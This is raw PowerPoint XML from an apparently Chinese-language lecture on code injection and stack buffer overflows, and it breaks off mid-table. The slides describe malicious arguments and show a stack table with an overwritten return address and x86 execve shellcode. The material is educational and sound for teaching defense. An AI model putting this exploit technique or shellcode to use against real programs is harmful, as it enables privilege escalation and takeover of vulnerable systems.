            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一个蓄意构造的字符串，其中包含一个指向某些恶意代码的指针，该代码也由攻击者提供。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当函数返回时，控制就被转移到了那段恶意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入的代码就会以与该有漏洞的程序相同的权限运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击者通常都以“以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>或其他较高权限运行”的程序为目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182010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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>恶意参数的特征</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>必须被漏洞程序作为合法输入接受。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>以及其他可控输入必定导致了漏洞代码路径的执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>在控制权转移到恶意代码之前，参数不能导致程序非正常终止。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1165877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187624" y="700896"/>
          <a:ext cx="7391400" cy="5557844"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="820738">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1421854">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5148808">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="271463">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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Figure 2-25. Program </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> overwritten by binary exploit</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="15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71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Line</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="15984"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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Address</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Content</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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746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1</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0xbffff9c0 – 0xbffff9cf</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"123456789012456" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>存储</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>Password (16 Bytes) Program allocates 12 but complier defaults to multiples of 16 bytes)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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68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2</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0xbffff9d0 – 0xbffff9db</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"789012345678" extra space allocated (12 Bytes) Compiler generated to force 16 byte </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>栈</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> alignments</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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3</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0xbffff9dc</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9e0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>) # new return address</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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4</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FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9e0</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Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>,%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> #set </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> to zero</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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5</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9e2</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>mov %eax,0xbffff9ff #set to NULL word</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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6</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9e7</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>mov $0xb,%al #set </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>代码</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>execve</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="宋体" charset="0"/>
                        <a:cs typeface="宋体" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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7</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9e9</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>mov $0xbffffa03,%ebx #</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>ptr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>arg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> 1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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8</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9ee</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mov $0xbffff9fb,%ecx #ptr to arg 2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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9</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9f3</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mov 0xbffff9ff,%edx #ptr to arg 3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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271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10</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accent1">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff9f9</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int $80 # make system call to execve</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="509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11</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0xbffff9fb</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arg 2 array pointer array char * []={0xbffff9ff, points to a NULL str</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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509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12</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0xbffff9ff</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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>"1111"}; – #will be changed to 0x00000000 terminates </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>ptr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t> array &amp; also used for arg3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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r h="509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13</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宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffffa03 – 0xbffffa0f</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="159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charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>"/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>usr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
